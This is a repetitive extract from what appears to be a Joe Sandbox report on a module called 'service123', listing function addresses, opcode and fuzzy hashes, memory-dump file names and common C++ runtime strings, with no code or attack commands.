Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: wcslen
String ID: basic_string: construction from null is not valid
API String ID: 4088430540-2991274800
Opcode ID: 7340dc9e915b5a85e54cf5f335c29d2f5d7910e82602f8e78e3bab805aabb1a6
Instruction ID: 46d99732424790e81ea7ce9315280dac2f6ee53ac6f1fecc88d562c797276fb8
Opcode Fuzzy Hash: 7340dc9e915b5a85e54cf5f335c29d2f5d7910e82602f8e78e3bab805aabb1a6
Instruction Fuzzy Hash: 71F03AB6A152148FCB00EF6CC48085AB7F4BB46218B0208ADE8C49B711E232ED49CF92

Function 6C3104F0 Relevance: 2.5, Strings: 2, Instructions: 42COMMON

Download Yara Rule

Strings

basic_string::substr, xrefs: 6C310548
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6C310550

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID:
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::substr
API String ID: 0-3532027576
Opcode ID: 11b13864fc1326197460435823b68a7f2b25b73d1ab8b12402d9e9a54c2e6f53
Instruction ID: a03ae998b283098d706d254c7eae160b2a72640210580d18f4dab4729671211a
Opcode Fuzzy Hash: 11b13864fc1326197460435823b68a7f2b25b73d1ab8b12402d9e9a54c2e6f53
Instruction Fuzzy Hash: 1A0124B6A0A300AFC708DF29D881A9AFBE1ABC9754F10992DE488D7704C234D8448F97

Function 6C31C2C0 Relevance: 2.5, Strings: 2, Instructions: 42COMMON

Download Yara Rule

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6C31C320
basic_string::substr, xrefs: 6C31C318

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID:
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::substr
API String ID: 0-3532027576
Opcode ID: b47d4fc8c7f3a5899fd0176b125317769835fc6b47e006f0b2e87e96db0f192d
Instruction ID: 25e5a113add0c244c3ec7b114f5e1df75bfe73a507737f578dc106b619db8009
Opcode Fuzzy Hash: b47d4fc8c7f3a5899fd0176b125317769835fc6b47e006f0b2e87e96db0f192d
Instruction Fuzzy Hash: A9015671A182009BCB04EF2DD48095AFBF1BBDA318F5089ADE4889B310D631E849CF86

Function 6C334490 Relevance: 2.1, APIs: 1, Instructions: 873COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45ad0b00f6aec0f2ff523773ec44868b8ba0f2eda38d91a83fafd78a7beca363
Instruction ID: bfd803baac7d67037c2ff5b00d9099aecc7ec28bba36a9e8cc498bc82d64cf12
Opcode Fuzzy Hash: 45ad0b00f6aec0f2ff523773ec44868b8ba0f2eda38d91a83fafd78a7beca363
Instruction Fuzzy Hash: C2827C71E042E88FDB10CFA8C48078DBFF1AF46318F199659E8A9AB795C3369845CF51

Function 6C332A7E Relevance: 2.1, APIs: 1, Instructions: 811COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d41543f747155f10b3103f44386def44fb07d05d8834c105e97b005a6583f67
Instruction ID: d846e3f19f05919151bef14f28532c0230c366463097848e05d0099686b72673
Opcode Fuzzy Hash: 0d41543f747155f10b3103f44386def44fb07d05d8834c105e97b005a6583f67
Instruction Fuzzy Hash: E772AF70A082E8CFDB11CFA8C58479DBBF1AF05318F149659E4A9AB792C3369845CF91

Function 6C3311BE Relevance: 2.1, APIs: 1, Instructions: 811COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ca3e5cc7814c9a926fe1879b8e142b601b13582b0ea432ad65a43906e06f377
Instruction ID: 1bcdc781cea82f5291c8e71f26105800aef50aee64bea78d73f4192149d6f52d
Opcode Fuzzy Hash: 1ca3e5cc7814c9a926fe1879b8e142b601b13582b0ea432ad65a43906e06f377
Instruction Fuzzy Hash: 61728C70A082E8CFDB10CFA8C48479DBBF1AF46328F189659D4A9ABB91D335D845CF51

Function 6C331E40 Relevance: 2.0, APIs: 1, Instructions: 790COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e430afa0f23da17b33d5ebf3784df48253831c7256301224b95207a4b42381cb
Instruction ID: 88f4f1f4d94e09f1214c36a7e7eb49e23976f33a20d392930b5cc40a67ed248f
Opcode Fuzzy Hash: e430afa0f23da17b33d5ebf3784df48253831c7256301224b95207a4b42381cb
Instruction Fuzzy Hash: 84727D70E093E88FDB11CFA8C58878DBBF1AF05314F149659D4A9AB792C336A845CF91

Function 6C330580 Relevance: 2.0, APIs: 1, Instructions: 789COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c1e7713511a1b5badd60ec9729ba6543a3a2387f9b081a5dcee5f5234e331e2
Instruction ID: 52a655d60a6b080a59411c7caa6f642a3bf491b63670590b10000f91e86f502a
Opcode Fuzzy Hash: 0c1e7713511a1b5badd60ec9729ba6543a3a2387f9b081a5dcee5f5234e331e2
Instruction Fuzzy Hash: CE728A70E093E88FDB11CFA8C48478DBBF1AF46318F289659D4A9AB791C335A845CF51

Function 6C31F510 Relevance: 2.0, APIs: 1, Instructions: 770stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C31F663

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 02536fe0dc21b9028167fedf7d8b1be13a2a62232735f22815451683cd99e0c3
Instruction ID: 3eb5dec0fe61b2d4a36e7a3a7b06b6fac0343c545d05052f534f432c087f4bc3
Opcode Fuzzy Hash: 02536fe0dc21b9028167fedf7d8b1be13a2a62232735f22815451683cd99e0c3
Instruction Fuzzy Hash: 16724974E082588FCB08DFA8C08459DBBF2BF4D314F288659E865ABBA1D735AC45CF51

Function 6C3377D0 Relevance: 1.9, APIs: 1, Instructions: 678COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3a32f907c6a8ceae1da1909919a83ba080bd7828556dc16eb397007c13cc67a
Instruction ID: e9e8416dbba2c2178989c8622a230864023d75d57b3154a3f722bee8961282a2
Opcode Fuzzy Hash: f3a32f907c6a8ceae1da1909919a83ba080bd7828556dc16eb397007c13cc67a
Instruction Fuzzy Hash: 5352D270A042A8DFDB00CF68C58479DBBF1AF46328F24965AE868AB791D336D845CF51

Function 6C322110 Relevance: 1.6, APIs: 1, Instructions: 357COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff6372ef0a9251d138f0073624f0ea2ae09fccbdc705b561bfa349615f81e9fa
Instruction ID: c4956ad969db42f777be4b088f8c388aa4d89a7c5cfddbb97630a6b0b3706c93
Opcode Fuzzy Hash: ff6372ef0a9251d138f0073624f0ea2ae09fccbdc705b561bfa349615f81e9fa
Instruction Fuzzy Hash: 13E17C75E152598FCF01CFA8C98468DBBF2BF49324F188265E465A7391C33AAD41CFA0

Function 6C34DA20 Relevance: 1.6, APIs: 1, Instructions: 328COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ddce1dec344faf4ac185e2707990aaa8d0d8670dbd329984dcfd35d468b9a667
Instruction ID: 59efa8ed7f077d94bb9d53bdb5f4e84c9f1a538e34ea6ac31454580d41b4f250
Opcode Fuzzy Hash: ddce1dec344faf4ac185e2707990aaa8d0d8670dbd329984dcfd35d468b9a667
Instruction Fuzzy Hash: 32D15E75A042598FCB01CF68C4806DDBBF1BF4A328F588269E865AB791D335ED45CFA0

Function 6C30E8C0 Relevance: 1.3, Strings: 1, Instructions: 23COMMON

Download Yara Rule

Strings

__gnu_cxx::__concurrence_lock_error, xrefs: 6C30E900

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID:
String ID: __gnu_cxx::__concurrence_lock_error
API String ID: 0-1226115927
Opcode ID: db7cf6847b9c1fd8bb0eeddb01ee32f5924a8a934619996e3a69d295b203e25c
Instruction ID: 514da3d69a745f98bcb070c16b156c7a045f0d0bf87b18fc3c3a60afa9f30134
Opcode Fuzzy Hash: db7cf6847b9c1fd8bb0eeddb01ee32f5924a8a934619996e3a69d295b203e25c
Instruction Fuzzy Hash: E9E048B6F083058F8B08EF34C58543BBBB16789100F40991DD88153B08D631D54C8F97

Function 6C310010 Relevance: 1.3, Strings: 1, Instructions: 20COMMON

Download Yara Rule

Strings

basic_string::at: __n (which is %zu) >= this->size() (which is %zu), xrefs: 6C310030

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID:
String ID: basic_string::at: __n (which is %zu) >= this->size() (which is %zu)
API String ID: 0-3720052664
Opcode ID: cc6e46ff49ff6191e51a09b5c5047d302b5e4649caa080cb04a8bc70ed06a9ec
Instruction ID: 176bb161e8e15620ee18c4503cacaeaee8dd5788b0ef5d1559b3c38ee4922ba8
Opcode Fuzzy Hash: cc6e46ff49ff6191e51a09b5c5047d302b5e4649caa080cb04a8bc70ed06a9ec
Instruction Fuzzy Hash: 18E0B6B5E096409FCB04EF18C585819F7F1BF9A304F54D99CE48497B20D631D914CE1B

Function 6C33D99E Relevance: .8, Instructions: 838COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed1a6876bac644dc89e754a2584cf39f469235da914dbd55bf1c77ff40718024
Instruction ID: f7a643dbff9b3ccd6fc711e93e8766f409a1d4508b7f1e6b25e6a6c722596b73
Opcode Fuzzy Hash: ed1a6876bac644dc89e754a2584cf39f469235da914dbd55bf1c77ff40718024
Instruction Fuzzy Hash: 0D729C70A143A8CFDB04CFA8C48079DBBB1AF46318F189659E858AFB91D375D885CF91

Function 6C3412C0 Relevance: .7, Instructions: 684COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 692313f8413dbde3fe73dab4997dcc30e59ab5b724aa17bce7403e3023aaa434
Instruction ID: c439382b67a15ba107619ebce5573ae290f8d2bf31369e85f77de0d65f984046
Opcode Fuzzy Hash: 692313f8413dbde3fe73dab4997dcc30e59ab5b724aa17bce7403e3023aaa434
Instruction Fuzzy Hash: FC52DD74A05A59CBDB00DF68C4843DDBBF1AF06308F18C259E854ABB91D336D996CFA1

Function 6C33FE10 Relevance: .7, Instructions: 683COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6e1258aad6c018392cf8009652b17a4b2a19eba08ecc672adf483ab94330c6e
Instruction ID: 5e6bb54e38db95de87ac59d3278a7fe56cd46a9a245cf8893fe0c5eae100e651
Opcode Fuzzy Hash: e6e1258aad6c018392cf8009652b17a4b2a19eba08ecc672adf483ab94330c6e
Instruction Fuzzy Hash: CB52AD74A05299CFDB10CFA8C08479DBBF1AF1A308F54C259E854ABB91D335D986CFA1

Function 6C340870 Relevance: .7, Instructions: 674COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b3c79d465c0f36701d01029cc7c639935b01dc18d7f34ecb477a51118bac359
Instruction ID: 5652704f01899cc654b341c6c1b4f56850d010fc8026c1f60ea1c51deb2c80a3
Opcode Fuzzy Hash: 9b3c79d465c0f36701d01029cc7c639935b01dc18d7f34ecb477a51118bac359
Instruction Fuzzy Hash: 57529B74B05689CFDB00DF68C18479DBBF1AF16308F14C259E854ABA91D336D986CFA1

Function 6C33F3C0 Relevance: .7, Instructions: 671COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8ee2b64bdbf3f0d7931e8a2cea95f54c1870db033e638e75f52d4757c6a1e68
Instruction ID: 56735c5bf316dae6db5ed8150170b54589e660fe9497c6f3e2115a635cf1f65a
Opcode Fuzzy Hash: c8ee2b64bdbf3f0d7931e8a2cea95f54c1870db033e638e75f52d4757c6a1e68
Instruction Fuzzy Hash: FC42F474A052A5DFDB00DF68C0847DDBBB1AF0D308F949299E858ABB91D335D886CF61

Function 6C314203 Relevance: .5, Instructions: 465COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 888535dd97e6fd7ad95dea1202a068aba4d7aba5296081c6ff17193bfab34392
Instruction ID: 4e2aee84b805658266780da6a8dda51d0d6d3f6e91abb6e7547752609299ab79
Opcode Fuzzy Hash: 888535dd97e6fd7ad95dea1202a068aba4d7aba5296081c6ff17193bfab34392
Instruction Fuzzy Hash: 19A13F72E4C244DF8700FF7DC94552ABBF0A75A228B88CA59E9A8C3B04F635D4148F63

Function 6C2F3000 Relevance: .4, Instructions: 356COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

